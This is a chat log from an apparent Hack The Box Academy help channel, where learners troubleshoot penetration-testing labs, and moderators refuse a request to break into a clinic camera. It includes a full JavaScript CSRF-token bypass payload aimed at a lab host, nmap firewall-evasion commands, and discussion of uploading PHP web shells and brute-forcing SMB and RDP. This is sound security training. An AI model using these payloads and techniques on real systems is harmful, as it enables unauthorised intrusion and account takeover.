Question: when i exploit, it gives error mentioning some session stuff

cloud urchin
#

When you get a target that has a specific port next to the IP, that's the only port you need to focus on. You don't need to do an nmap scan etc.

winged knoll
cloud urchin
winged knoll
#

Sure

prisma thistle
frigid bay
#

I am trying to set up a pivoting tunnel with DNScat2. I need to the "listen" command for that but I can't find it

I aslo try to use the -h flag. But I received and error

steel snow
#

Hello! i think there is an issue in the fingerprinting section int he information gathering - web edition

#

can anyone confirm?

fathom pendant
steel snow
#

outdated servers and answers

fathom pendant
#

If you previously completed the module, the questions may not line up due to an update to the module

steel snow
#

no no, i didn't complete it before

#

but the module's questions and answers are outdated

#

for example, now the module server serves is NGINX

#

it was apache and the server asks for apache

#

although it's asking for NGINX and now, the current nginx version doesn't work

fathom pendant
#

??

ocean night
#

I think you may not be looking at the right target..

fathom pendant
#

I'm getting the right answers on my end

ocean night
#

Also, dnscat isn't mentioned I don't think?

fathom pendant
#

The first two questions deal with app.inlanefreight.local, the third question deals with dev.inlanefreight.local

steel snow
#

i mapped both to the same IP

#

which is correct

fathom pendant
steel snow
#

did you get an apache?

#

because i am getting nginx

fathom pendant
frigid bay
ocean night
#

Sure, what I meant was it's not in the module you're on currently

steel snow
ocean night
#

Was confused why it was being mentioned. nvm

#

Confirmed fine here also on new spawn

#

Could be you had an old IP listed or something? 🤷‍♂️

steel snow
#

i checked but no

#

but now i removed everything from my hosts file and

#

i still have access to the web even after i terminated the machine

#

so i wonder what's happening

ocean night
#

That's probably not the right target IP then tbh. Not sure what else to say. Restart VPN, start target again, try again

fathom pendant
steel snow
#

i meant all the older mappings

fathom pendant
#

But aside from that:

steel snow
#

i have access to the website even when nothing in my device is pointing to it

fathom pendant
#

Likely cached

steel snow
#

probably

#

you are correct ahhh

#

caching is so weird

#

always creates these confusing issues

fathom pendant
#

Not really, it saves time for refetching pages

ocean night
#

If you can still access it with curl for example, something else is going on

steel snow
near rock
#

Are you talking about the connection to the machine through openvpn?

ocean night
#

Bottom line is, if you can access an IP after terminating a machine / target, you are connected to a different VPN.

steel snow
#

although the ip was there

#

now i created a new openvpn instance

#

it worked finally!

fathom pendant
steel snow
#

that was mapped in the hosts file

fathom pendant
#

¯_(ツ)_/¯

steel snow
#

things worked now tho! finally

lusty thicket
#

awesome stuff

shut wraith
#
[-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_loadlib request.```
What does it mean if right when the connection establishes and the stage is being sent to the target then the above is shown and the session that is supposed to open just closes right away
edgy ember
urban forge
#

How do i know where and how many websites or services my contact number is linked to as i want to change my number everywhere and I don’t know where is my contact number is linked

frigid bay
#

I am doing SOCKS5 Tunneling with Chisel section. I tried to scan my network in order to find the ubuntu host but no luck. How would you go about finding the Ubuntu host ip if it was not given by the exercise?

fathom pendant
#

if you're signed up for that many sites and don't know which is tied to your number, you have a problem kek

hazy magnet
#

When are they supposed to release the remaining modules for the AI Red Teamer path?

dark hedge
hexed oyster
#

does anyone know how to tell SSTIMap how to fuzz a particular field?

#

Instructions unclear... stuck in ceiling fan...

dark hedge
#

really?

lusty thicket
#

can i have one too? 😭

dark hedge
#

you also want to point me to the support hub?

#

what is up with these bots

safe star
cloud urchin
#

feels targeted honestly

dark hedge
#

really starting to want the Academy verification

waxen totem
pine dune
#

Hi

#

I cant uplod my images here for some reason

#

keeps saying upload failed

#

Do I need the Yoya when inserting my php web shell?

#

I tried changing the filename and also getting rid of all the red text and adding my php shell there

#

it didnt work tho or the site may be buggy

fathom pendant
pine dune
fathom pendant
#

magic bytes are important

pine dune
#

ahh ok

fathom pendant
#

it tells the backend that yes this is <filetype>

pine dune
#

idk which ones to keep and also the example didnt have any magic bytes

fathom pendant
#

and not just a file uploaded as type

#

google

pine dune
#

ok hold on

fathom pendant
#

A file signature is data used to identify or verify the content of a file. Such signatures are also known as magic numbers or magic bytes.
Many file formats are not intended to be read as text. If such a file is accidentally viewed as a text file, its contents will be unintelligible. However, some file signatures can be recognizable when interpr...

lusty thicket
#

this question has never been asked before 😭🙏

mighty magnet
fathom pendant
#

@rustic sage keep it pg-13 bro, no one cares how desparate you are #rules

fathom pendant
#

also very much NOT on topic of this channel

#

if you read and follow #welcome you can access more of the server

rustic sage
#

You never know what could happen

fathom pendant
#

don't care it's not on topic of the channel

rustic sage
fathom pendant
#

this channel is for discussion of academy modules and help with them

fathom pendant
#

told you how to access more of the server, if you even can read

rustic sage
fathom pendant
#

you also started off your statement about wanting a hot gf

#

so that's why it was removed

rustic sage
fathom pendant
#

:)

#

not random topics that have nothing to do with the learning modules or content of the site

#

hacking a clinic camera is illegal

#

<@&861185840277487616>

#

you don't own the camera, nor do you have permission to access it

#

the important lesson is don't do illegal shit

#

if she's cheating on you then confront her without sneaking behind her back

#

and break it off if you're that paranoid

dark hedge
#

here is an important lesson, do not ask for how to do things with less than ethical intentions

fathom pendant
#

for one: legal issues

#

i'd rather not go to jail because i think my gf is cheating on me because i'm insecure

dark hedge
#

this question will not be moral, you can stop the conversation here.

fathom pendant
#

^

dark hedge
#

please keep it legal

fathom pendant
#

and on-topic of the channel

waxen totem
#

Can't wait for the academy verification... 😅

fathom pendant
#

g0b alt spotted Kapp he was testing the mods

waxen totem
#

👀 sus

near rock
#

Damn, looks like I missed something.

valid viper
#

Why can't I post a .gif?

#

wadafawk?

jolly cradle
#

@valid viper you need to be Silver+ or Hacker+

valid viper
#

Bah...

analog dock
#

Screaming at me

torpid hazel
#

??

cloud urchin
#

is this part of a module?

torpid hazel
#

No like i'm researching

cloud urchin
#

this channel is for questions about academy stuff

torpid hazel
#

Okok suure my bad

hot grove
#

hey guys , I was going thru Linux Fundamentals - Working with Web Services and it seems like this page is slightly broken as you cant claim the cube nor view the rest of the lesson on the right as you typically should be able to. I put a photo of the lesson , and then the lesson that is after as well , any pointers in claiming the progress/cubes?

#

anyone have this same issue with this lesson in particular ?

cloud urchin
hot grove
#

nothing

cloud urchin
#

is it full screen or something? press f11

hot grove
#

no its not full screen, i have a huge monitor lol... anyways , can you recreate the issue yourself or does it work for you ?

ocean night
#

Just asking for help with a Tier 3 module assessment.. I advise you re-read the module contents, try to put in to words what you are struggling with, and pay close attention to the module as you go through it again. Everything you need is in the sections prior to the assessment @next stone

cloud urchin
hot grove
#

i posted exactly what you need to se

ocean night
#

If you are still struggling, I'd suggest in a low level describing how you are struggling, without spoiling the content itself.

hot grove
#

try it out

cloud urchin
#

the page loads fine for me

#

maybe disable extensions or try another browser

hot grove
#

pic?

#

thank you m8

ocean night
#

It looks like perhaps you don't have Javascript enabled

#

I say this, as the markdown is not being parsed in your screenshot

hot grove
#

youre right.. No wonder it was looking a little funky, interesting

wild fern
#

can someone explain stack alignment in asm? I cant figure out the logic behind it

lusty thicket
pseudo kiln
#

has anyone around here encountered issues with ligolo and ssh ?

waxen totem
#

Could be SSH trying to bind to the same port as ligolo

fervent linden
#

Help . Im gonna publish the Introduction to earn Cubes but I found stuck at this question with ... no answer place ? HELP !

#

{I cant send image}

waxen totem
#

Which module, which section, and which question?

fervent linden
#

[ The question : This is a tier 0 "free" module . .... ]

#

pls help

waxen totem
fervent linden
#

I know but how to Submit

#

AFK a bit I'll rigth back

#

like 6.pm timeline +7

pseudo kiln
#

@waxen totem you are a legend among legends. That was it. Leaving below how I got it working

ssh -o 'ProxyCommand=socat STDIO TCP4:%h:%p,bind=0.0.0.0:40000' <user>@<host>
waxen totem
#

I don't even know what half that command does but ok

pseudo kiln
#

it basically tells ssh to connect through a socat "proxy", which lets you specify the source port

waxen totem
#

ohhh, kewl

pseudo kiln
#

not sure if proxy is the correct term though

fickle thicket
#

hi, anyone here completed Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment ? Need some help

lone locust
#

Hello guys I just stuck on this module. The question is " Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer."
So I applied a filter in Wireshark arp.opcode == 1 && eth.src == 08:00:27:53:0c:ba
and I still not get it how I suposed to find the number of ARP requests.
Any ideas about that? Thank you!

safe star
restive vortex
#

I'd seriously appreciate some help on the hard lab in Network enumeration with nmap - IDS/IPS evasion techniques. I've tried using multiple flags such as -sS, -Pn and built in nmap scripts but its either returning as filtered or erroring out.
Example commands I've tried
nmap -sS -Pn -T2 -p1,1000 <target_ip>
nmap -sU -Pn -T1 -p1,1000
It wants me to identify the version of a certain service, the only services i get returned are ssh and html. tried entering the apache version (2.4.29) and the openssh version (7.6p1) to no avail.

#

this is my second time asking for help on this module section.

bright ridge
restive vortex
#

like putting a random number in for the port?

bright ridge
#

you need to figure out what port thats getting filtered first

restive vortex
#

what techniques can i do to find that out?

bright ridge
#

nmap -sA -Pn -p1-1000 <target_ip>

#

—source-port is good with 53 (dns)

#

message me if you are still stuck

robust pecan
#

hello, I'm new in the HTB, can i ask how to obtain more cubes?

acoustic owl
quartz lagoon
# restive vortex this is my second time asking for help on this module section.

i'm on the same module it's so unintuitive aPES_Cry , can someone explain to me why using the first command, port 53 is filtered and using the second it isn't? I used the same source port on both. Does it have to do with disabling arp and ICMP echo requests or the fact that i put more ports to scan on the second? (i'll delete the screens after someone answers to avoid spoiling too much)

#

i tried rerunning the exact first scan and now it's showing the port as open and running -sV lmao I don't get it

glad frost
#

I got stuck on "Bypassing CSRF Tokens via CORS Misconfigurations" exercise.
Here is what I have been trying which seems to be correct but when debugging, it appears it's not working. Any help is much appreciated. Thanks.
Payload:
||```js
<script>
// GET CSRF token
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://bypassing-csrftokens.htb/profile.php', false);
xhr.withCredentials = true;
xhr.setRequestHeader('Origin', 'null');
xhr.send();
var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
var csrftoken = encodeURIComponent(doc.getElementById('csrf_token').value);
// do CSRF
var csrf_req = new XMLHttpRequest();
var params = promote=htb-stdnt&csrf_token=${csrftoken};
csrf_req.open('POST', 'https://bypassing-csrftokens.htb/profile.php', false);
csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
csrf_req.withCredentials = true;
csrf_req.send(params);
</script>

quartz lagoon
#

that was on the medium lab* i forgot to mention that

bright ridge
#

oh ok

quartz lagoon
#

i just didn't get why the same command was producing two different results lol

#

but yeah i finished the module i was just curious

empty trout
#

can anyone suggest me a good tool to bruteforce smb and rdp , netexec is not working so used crackmapexec and it is slow and thinking of using medusa

dawn tiger
dark hedge
#

please do not join that server, it is not affiliated with HTB in any way

novel matrix
#

^

#

user banned

dawn tiger
#

then anyone can help point out my mistake, I can dm privately?

dark hedge
dawn tiger
#

I am not beautifying the response but somehow my payload still does not work. please can you take alook at my payload?

dark hedge
#

it's been a while but you can DM me the payload

dawn tiger
#

DMed thank you.

empty trout
#

i am at module = password attacks , on practise lab hard and port which are open msrpc smb rdp nfs i wanted to bruteforce rdp and smb i used hydra on rdp and got password but it was false possitive so used netexec and crackmapexec and they are very slow . i was thinking of using medusa for smb and rdp but it is not working on smb and it does not have rdp module

#

??

dark hedge
#

please keep the channel on-topic

#

and please don't copy paste in other irrelevant channels

empty trout
#

can anyone suggest me what i can do here other than bruteforcing and if bruteforce which tool i can use . i know there is no perfect tool but i cannot use hydra and netexec , crackmapexec are very slow

empty trout
#

Can we do smb or rdp with it

dapper moth
#

Depends on the env setup and what you want. Is it Domain joined? Do you want to test already known credentials for these kind of services access?

#

Cause if you are only password spraying to find a a valid credential in a Domain environment, you can do it with Kerbrute and then test for what level of access the enumerated accounts have

ancient niche
#

hi there guys I need bit help with this. Here I'm stuck bit.

pseudo kiln
ancient niche
#

0😅

fathom pendant
#

ranges use a - not a comma

#

a comma separated list says scan ports x,y,z

#

-p- scans all ports 😉

zenith token
#

Hi there, can anyone give me a small hint to the Footprinting Module -> Footprinting Medium lab?
I do not provide any details yet, since I don't want to spoil stuff

fathom pendant
#

don't overthink it

zenith token
#

Easier said than done 😅

fathom pendant
#

don't try and run fancy commands or flags, keep it simple and basic

zenith token
#

So far I scanned the ports mounted a drive, found a username and password, but have not yet the proper "next" service, for which I can use those credentials

ancient niche
#

someone can help me pls? 🙂

fathom pendant
zenith token
#

Yes I did. But I just opted for the Solution. I mean I know now what you mean with go the "direct" path... but still it is not as straight forward to get to the solution. You have to jump through multiple hoops for that. I hope there will be one day, where I am able to solve those easy questions quicker... But for now, I just need help all the time.

#

But I guess, this stuff just takes a looooooot of time to master

pine dune
#

Hi guys I need help with blacklist filters in file uploads. I uploaded my php webshell through burp and changed the extension to something that shouldn't be blackilisted. I tried both methods of keeping the magiv bytes there and removing them in burp before adding my web shell. It still gives me a weird and long "src" in the website and its differetnt to the example, however the file does get successfully uploaded

fathom pendant
#

you won't learn anything this way

#

you'll just learn to be reliant on the easy way out

fathom pendant
zenith token
fathom pendant
pine dune
fathom pendant
fathom pendant
#

it's above t0 so spoiling content

pine dune
#

alr cool, its really weird tho. Like its a really long paragraph of letters and numbers 😅

pine dune
fathom pendant
pine dune
fathom pendant
#

i'll wait for the dots to click

near rock
#

But continuing from general, I connected to us academy 4, which is currently low level, and tried both udp and tcp protocols.

#

It’s not like an urgent problem or anything. It’s simply that I can’t continue or answer the questions without accessing the machine.

fathom pendant
#

reach out to support

ancient niche
#

guys i need bit help 😄

fathom pendant
#

¯_(ツ)_/¯

fathom pendant
ancient niche
near rock
#

Okay, although I’m pretty sure I won’t hear back until Monday.

fathom pendant
#

so don't expect an immediate reply

near rock
#

Fair enough.

ancient niche
#

i'm going to follow trying

fathom pendant
#

i suggest trying to restart your vm and connecting again; ensuring only 1 tun device is active

final salmon
#

Looking for some guidance on "Lateral Movement", "Skill Assessment" final question. I have got everything up to the connection, but when I try to connection through proxychains all ports return connection refused. Anybody have any pointers?

near rock
#

Well I did manage to get it fixed and made some progress.

ancient niche
#

today i did many hours already i'm good for today good night people.

sand sedge
zenith token
cloud urchin
tawny solar
#

Is any one solve AI Red Teamer?

whole vale
#

hey small problem, i am at the skills assesment for login brute forcing and the first part is this login page thats not a page, its the website requesting the login stuff via / and when i try hydra to get any info from it all it says is 1 of 1 target completed 0 passwords found, i have tried burp and some other random stuff like admin : admin and more but because it needs the login stuff before you get access its just weird.

fathom pendant
#

try with user

fathom pendant
whole vale
#

Thanks I got in and did the whole ftp stuff easily, it was just starting that was hard

fathom pendant
#

just gotta think inside the box at times kek ¯_(ツ)_/¯

whole vale
#

yeah you wouldnt think admin admin would be a login, or user, but i guess they train you that way for a reason

somber whale
#

If I go through the modules as a complete beginner. Will you learn all you need to learn to get through the CTFs or do you need more knowledge than that?

#

I was looking into the training from Hackers Arise occupy the web guy

fathom pendant
#

OTW is a sham

#

but the modules teach you how to not only attack a vulnerability but to identify it as well

#

as far as for ctfs? sure, you can use the knowledge for ctfs

#

but the knowledge goes beyond ctfs and is applicable to real world scenarios

gaunt forge
#

I'm stuck on RDP and SOCKS Tunneling with SocksOverRDP on the pivot module. Whenever i start the dllregisterserver i get a notification that the plugin suceeded, but it never actually works. I dont get the socksrdp plugin is enabled notification when I start up mstsc.exe, and when i run netstat -antb | findstr 1080, nothing is returend.

wicked roost
gaunt forge
#

I disabled windows defender rtm, any ideas?

#

here this screenshot shows pretty much everything, and it really should be a simple lab

steep canyon
#

@zinc mason

torn mountain
#

Hi

gaunt forge
#

hello

zinc mason
gaunt forge
#

no idea

#

can someone help me with what I've posted please?

upper ruin
#

Windows PrivEsc Skills Assessment

There is 1 disabled local admin user on this system with a weak password that may be used to access other systems in the network and is worth reporting to the client. After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.

I got the hash, but when I crack it, the answer is either not what it's supposed to be, or the way it's shown confuses the hell out of me.

#

So my question is...how do I crack it so I obtain a password...

gaunt forge
gaunt forge
upper ruin
#

I did try it, but the output is just...impossible for it to be such.

gaunt forge
upper ruin
#

yh, gimme a sec

fathom pendant
fathom pendant
gaunt forge
fathom pendant
#

change vpn regions?

gaunt forge
#

I didn't do that

fathom pendant
#

¯_(ツ)_/¯

gaunt forge
#

should i do that? I dunno how that would change anything

fathom pendant
#

sometimes that fixes it

#

sometimes an instance on a vpn region is just bugged

gaunt forge
#

okok gotcha thanks

fathom pendant
#

and switching to the next one over or from EU -> US or US -> EU fixes it

gaunt forge
#

thats dumb but thank you

quartz jacinth
#

Hello guys , im new here and i am in the nmap enumeration module

gaunt forge
#

thats the flag right there lol you got it

quartz jacinth
#

i im kinda stuck in this module cause http-enum wont run in nmap

quartz jacinth
#

i wanted to know why http enum didnt find the robots.txt file

gaunt forge
#

yeah im not sure, it shoul'dve worked

#

I think for that module i didn't even run any of the nmap scripts and just found it manually

#

but thats not a good answer. anyone else?

quartz jacinth
gaunt forge
#

just because it was something mentioned in the module and i thought I should try it

#

you really need to take notes for everything in that module though, your screwed if you don't. you'll definitly forget something like checking robots.txt

quartz jacinth
#

i do take notes in obsidian but i didnt see anything in the module mentioning robots.txt before nw

fathom pendant
quartz jacinth
#

sorry

gaunt forge
#

i think you gotta use the nmap command like --script http-enum, you had different syntax that might not have worked? not completely sure tho

fathom pendant
#

also it's a tier 1 module, so be careful of spoiling (see channel topic)

gaunt forge
#

your right tho i dont think robots.txt was mentioned in that module

pliant vessel
#

Last 1 more really..

quartz jacinth
fathom pendant
#

you can ask questions just be mindful of spoilers

#

:P

#

i.e. a screenshot with the flag

fathom pendant
quartz jacinth
#

--script vuln gave me every thing except http enum for some reason , i will run it to recheck

fathom pendant
#

¯_(ツ)_/¯

quartz jacinth
cloud urchin
#

chatgpt will often times get syntax wrong, or make up parameters in commands. just a fyi not to fully trust it.

quartz jacinth
#

sudo nmap -p80 --script http-enum -T4 -Pn <IP>

quartz jacinth
zealous rampart
#

Hey all, having issues with the Into to malware analysis - Dynamic Analysis. Noriben seems to error out. I saw on the forum people said to wait 10 minutes, or forxe quit procmon, but those didn't seem to work either

quartz jacinth
fathom pendant
#

¯_(ツ)_/¯

zealous rampart
#

damn here for 1 minute and got "try harder"

fathom pendant
#

that wasn't for you

zealous rampart
#

I just realized that, my bad

fathom pendant
#

i was already in a convo with shab

#

lol

quartz jacinth
fathom pendant
#

haven't touched the SOC path; plan to eventually for reasons™️

upper ruin
# fathom pendant if it cracked then idk what else to tell you bud;

I realised my mistake, apparently I dumped sam and save only, I then noticed that all the hashes are the same, meaning there was inconsistency. So I proceeded to dump save,sam and security, which ultimately gave me the proper hash. I obtained the pass, this windows priv esc module has been completed.

#

I hope that attacking enterprise networks isn't that tough.

fathom pendant
#

security is the important one lol

upper ruin
#

I can finally attend the cpts

fathom pendant
zealous rampart
upper ruin
#

Well, I am about to experience it soon enough.

fathom pendant
#

i heavily recommend doing it blind, spin up target -- don't read the text or questions

fathom pendant
#

and the questions are very leading

fathom pendant
zealous rampart
upper ruin
#

Funny enough, idk if I am lucky, I got a contract in Pentesting, it's going well for now, but it sure ain't like HTB.

fathom pendant
#

well yeah

#

in an rl engagement you can't ask for nudges

upper ruin
#

Nah not the nudges, but like

#

I barely find XSS, no cmd injection

fathom pendant
#

yeah

quartz jacinth
fathom pendant
quartz jacinth
#

ok cool ill try to figure out how to use it

fathom pendant
#

if you run the md5sum command on a file, it will provide the md5 hash which you can compare

#

literally the only reason i showed the command and output was so that you can compare it to your own system as a pseudo sanity check of sorts

#

if they match then great

upper ruin
#

Common w marcie

fathom pendant
#

if not then something got fubared

quartz jacinth
#

ok makes sense

upper ruin
#

Yo marcie, what's your experience with the CPTS, what did you do to obtain it. As in...did you review something specific before the exam...did you do any tough labs?

#

I personally plan to review the skills assessments, on each module, hoping it can somewhat help.

gaunt forge
upper ruin
#

Yo nathan

#

Did you finish the SoRDP

gaunt forge
#

no i gave up lmao ill switch vpn servers and try again later but im doin the skills assesment rn

fathom pendant
gaunt forge
#

and brainrotting so its going slowly

fathom pendant
#

i didn't review anythiing specific or do any labs on the main site

#

didn't wanna get in my head about stuff that would be out of scope

upper ruin
#

Didn't someone say you had another account with it

#

Hm, okay. Thanks for the tips.

upper ruin
fathom pendant
upper ruin
#

Fair enough

quartz jacinth
#

its the same

fathom pendant
#

weird

#

¯_(ツ)_/¯